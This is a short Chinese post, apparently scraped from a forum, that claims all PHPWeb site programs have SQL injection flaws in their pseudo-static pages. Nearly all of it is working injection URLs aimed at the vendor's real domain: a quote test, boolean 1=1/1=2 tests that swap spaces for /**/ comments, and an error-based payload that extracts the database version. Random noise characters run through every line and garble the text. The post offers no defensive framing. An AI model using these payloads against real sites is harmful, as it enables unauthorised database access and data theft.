phpweb所有的整站程序伪静态页面都存在sql注入# E# y9 r' r/ J& B2 P$ v/ E1 T# i
' g' N: n9 Q, X% R+ h2 U
主站:http://phpweb.net/
4 t0 q3 a0 g7 l加’检测:7 o2 {. p# Q" t
/ }! I- ?! r* b; ihttp://www.phpweb.net/down/html/?772′.html. @) F7 J- u! P K% I/ ?( ?
6 W2 g. ?$ |4 J
出错1 E& z% p- _( e+ J
存在注入。
) i1 `& ]" Q+ d. } X6 S不能用空格,只能用/*罗
9 a. D% v; l+ o0 {* \http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常8 Q1 o5 [5 s T1 {: ?
- ]: `% N# _9 z5 e$ w: m9 zhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
' w8 E! u( R3 E0 y, v/ v爆数据库版本:. n5 `7 w+ g! D' e0 h
5 I5 }$ ?7 ?# n z
?0 v4 p! C% J% ?* N' O
1
' ]8 P8 ~9 ~ V* D0 X3 chttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html& z" Q3 J8 q2 L- r n
更新日期: 2013-01-03 13:39:50
' s2 D3 c4 F9 m& E |